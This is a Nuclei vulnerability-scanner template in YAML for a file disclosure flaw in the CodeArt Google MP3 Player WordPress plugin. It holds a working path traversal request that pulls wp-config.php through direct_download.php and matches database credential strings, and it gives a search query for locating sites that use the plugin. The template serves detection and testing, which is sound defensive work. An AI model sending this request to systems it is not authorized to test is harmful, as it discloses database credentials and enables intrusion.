Files
nuclei-templates/http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml
2024-12-01 13:57:55 +00:00

42 lines
1.3 KiB
YAML

id: wp-googlemp3-lfi
info:
name: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download
author: theamanrawat
severity: critical
description: |
WordPress Plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download file from server.
reference:
- https://www.exploit-db.com/exploits/35460
- https://wordpress.org/plugins/google-mp3-audio-player/
metadata:
verified: "true"
max-request: 1
publicwww-query: "/wp-content/plugins/google-mp3-audio-player/"
tags: wp-plugin,wp,wordpress,lfi,google-mp3-audio-player,unauth,disclosure
http:
- raw:
- |
GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_USER"
- "DB_PASSWORD"
- "DB_HOST"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a0047304502210089b97aee0bbfa86dc1937c9fed4516aedf5151fdc07015aa976b686d6f3ff72702200d1a048503ec2e670117c6a7e1ed0cc5bb2d07ed7520e92a51c4ef0a9f393cd8:922c64590222798bb761d5b6d8e72950